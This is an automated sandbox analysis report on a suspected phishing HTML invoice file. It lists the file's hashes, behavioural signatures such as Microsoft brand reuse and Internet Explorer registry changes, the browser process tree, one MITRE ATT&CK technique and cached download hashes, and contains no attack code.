Analysis

  • max time kernel
    37s
  • max time network
    35s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-03-2023 08:21

General

  • Target

    Tallon SOP Invoice (Single).html

  • Size

    345KB

  • MD5

    6d039563bc00dd48c90ab1c3fb22670a

  • SHA1

    b3cdde7b163549addaf54b160fcec303ae59136d

  • SHA256

    41032026e75479d5defd71c7dd2c3fcaa1c72a8b44cb8a387339f8455c910221

  • SHA512

    1e21e4faf91636dbe18d13526070aab80811b3afc7e569949bdd3d6e9d454287613292380ec16d6d3a89de37e87b53a41273d89235566f9d76d940d8402fd755

  • SSDEEP

    6144:D+cONCmQ+ZoWY9CLgO/ye730cxHzfjpmUqvMmy:D+cONCmQ+ZRLx/yEH3EHvMJ

Score
5/10

Malware Config

Signatures

  • Detected potential entity reuse from brand microsoft.
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" "C:\Users\Admin\AppData\Local\Temp\Tallon SOP Invoice (Single).html"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4216
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4216 CREDAT:17410 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:4192

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    Filesize

    471B

    MD5

    81e074fc1cade892fd87593f0a9fa5d7

    SHA1

    0be86dbe06e55e575909ba567d4d55de3999603f

    SHA256

    ac22d20053b4bfe019939e425b716c857b87c424925289ff9cb3cb646192f8e3

    SHA512

    db2bc9c95711e8b62666b5194d58bafce974c01d0345270ca2a832a17ac4b756338349dd8ef2b6e0d14773afc3de4ccea036fc247cf1d5042785655012667e91

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    Filesize

    434B

    MD5

    1b3c51399e5d158a87d4f025e398d2bb

    SHA1

    8ffcef442bf9dfb314fff03c056855283bc94af6

    SHA256

    4bbc8552fdac46157f78e67fe36af5dd441d50436e8a274c246cf1c669a454f3

    SHA512

    b628fd316e31bd8b97e03bfc6e4c7cb5f976fb4db99047990c31d98bbcb5ccd3a44ac4f82f184e1a3dbb2f1a8db99d83dd81109fb9f071e58d9b7ead7d150efd